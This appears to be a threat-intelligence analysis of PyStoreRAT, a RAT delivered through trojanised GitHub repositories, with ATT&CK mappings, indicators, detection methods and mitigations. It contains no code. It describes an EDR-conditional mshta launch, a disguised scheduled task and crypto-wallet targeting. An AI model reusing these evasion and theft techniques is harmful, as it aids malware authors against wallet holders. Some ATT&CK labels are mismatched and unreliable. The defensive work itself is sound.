Full Report
Cybersecurity researchers are calling attention to a new campaign that's leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT. "These repositories, often themed as development utilities or OSINT tools, contain only a few lines of code responsible for silently downloading a remote HTA file and executing
Analysis Summary
# Tool/Technique: PyStoreRAT
## Overview
PyStoreRAT is a previously undocumented, modular, multi-stage, JavaScript-based Remote Access Trojan (RAT) distributed via compromised GitHub repositories disguised as development utilities, OSINT tools, or GPT wrappers. Its primary purpose is to establish a persistent foothold, exfiltrate sensitive information (especially cryptocurrency wallet data), and download subsequent stages of malware.
## Technical Details
- Type: Malware (Remote Access Trojan - RAT)
- Platform: Windows (implied by execution via `mshta.exe` and Win32 technologies like `cmd.exe`, `rundll32.exe`, PowerShell)
- Capabilities: Modular execution (EXE, DLL, PowerShell, MSI, JS, HTA), system profiling, cryptocurrency wallet credential harvesting, execution evasion techniques.
- First Seen: Earliest signs of the campaign date back to mid-June 2025.
## MITRE ATT&CK Mapping
- T1566 - Phishing: Supply Chain Compromise
- T1566.001 - Spearphishing Attachment (Leveraging trust in GitHub repositories)
- T1189 - Drive-by Compromise (Leveraging user trust to download/execute code)
- T1059 - Command and Scripting Interpreter
- T1059.003 - Windows Command Shell (Using `cmd.exe`)
- T1059.005 - Visual Basic (HTA execution utilizes embedded scripts)
- T1059.006 - PowerShell
- T1204 - User Execution
- T1204.002 - Malicious File
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (C2 communication)
- T1027 - Obfuscated Files or Information
- (Execution of modules in memory)
- T1053 - Scheduled Task/Job
- T1053.005 - Scheduled Task
- T1049 - System Network Connections Discovery (Implied by system profiling)
- T1082 - System Information Discovery (System profiling)
- T1041 - Exfiltration Over C2 Channel (Final stage functionality)
## Functionality
### Core Capabilities
- **Initial Infection Chain:** Leverages Python/JavaScript loader stubs embedded in compromised GitHub repositories to silently download and execute a remote HTML Application (HTA) file via `mshta.exe`.
- **Modular Execution:** Capable of downloading and executing various payload formats, including EXE, DLL, PowerShell scripts, MSI packages, and raw JavaScript code.
- **Persistence:** Establishes persistence via a scheduled task disguised as an NVIDIA application self-update mechanism.
- **Information Stealing:** Specifically scans systems for files associated with cryptocurrency wallets (Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02).
### Advanced Features
- **Execution Evasion:** Attempts to reduce visibility by checking for the presence of security products like CrowdStrike Falcon ("Falcon") or Cybereason/ReasonLabs ("Reason"). If detected, it launches `mshta.exe` through an intermediate `cmd.exe` process; otherwise, it executes `mshta.exe` directly.
- **In-Memory Script Execution:** Can fetch raw JavaScript code and execute it dynamically using `eval()`.
- **Second-Stage Delivery:** Can spawn a secondary `mshta.exe` process to load additional HTA payloads.
- **Lateral Movement:** Capable of spreading via removable drives by replacing legitimate documents with malicious Windows Shortcut (.LNK) files.
## Indicators of Compromise
- File Hashes: Not provided in the text.
- File Names: Not explicitly provided, but initial artifacts involve HTA files.
- Registry Keys: Not specified (Persistence relies on Scheduled Tasks).
- Network Indicators: Contacts an external server in the final stage to fetch commands. (Specific C2 domains were not listed/defanged).
- Behavioral Indicators:
- Execution of remote HTA files via `mshta.exe`.
- Creation of a scheduled task disguised as an NVIDIA update.
- Use of `cmd.exe` to invoke `mshta.exe` when EDR evasion is triggered.
- Scanning for specific crypto wallet directory structures.
- Dynamic execution of PowerShell commands in memory.
## Associated Threat Actors
- Unknown, but initial analysis suggests a threat actor of likely **Eastern European origin** due to the presence of Russian-language artifacts and coding patterns.
## Detection Methods
- Signature-based detection: Detection for the specific file hashes of downloaded payloads (once obtained).
- Behavioral detection: Monitoring for unusual execution chains involving Python/JS loaders, downloading HTA files from unusual GitHub origins, and the sequence of `mshta.exe` invocation with process lineage checks. Specifically targeting the creation of persistence mechanisms disguised as NVIDIA updates.
- YARA rules: Not available based on the provided text.
## Mitigation Strategies
- **Source Trust Assessment:** Exercise extreme caution when downloading and executing code, even from seemingly trusted platforms like GitHub, especially for utilities promising advanced features (OSINT, AI/GPT tools).
- **Execution Control:** Restrict or tightly control the execution of HTA files through application allow-listing policies.
- **Script Execution Monitoring:** Implement strong monitoring for script interpreters (`mshta.exe`, PowerShell) spawning from unexpected parent processes or performing direct network connections.
- **Privilege Separation:** Ensure standard users do not have system-level privileges that would allow persistent malware installation.
- **Evasion Rule Awareness:** Harden monitoring against common evasion techniques, such as checking for common EDR strings ("Falcon," "Reason") preceding execution decisions.
## Related Tools/Techniques
- Rhadamanthys: Deployed as a follow-on payload (information stealer).
- Stargazers Ghost Network: Similar social engineering/platform manipulation technique used to boost repository visibility.
- Modular, script-based implants seeking to adapt to security controls.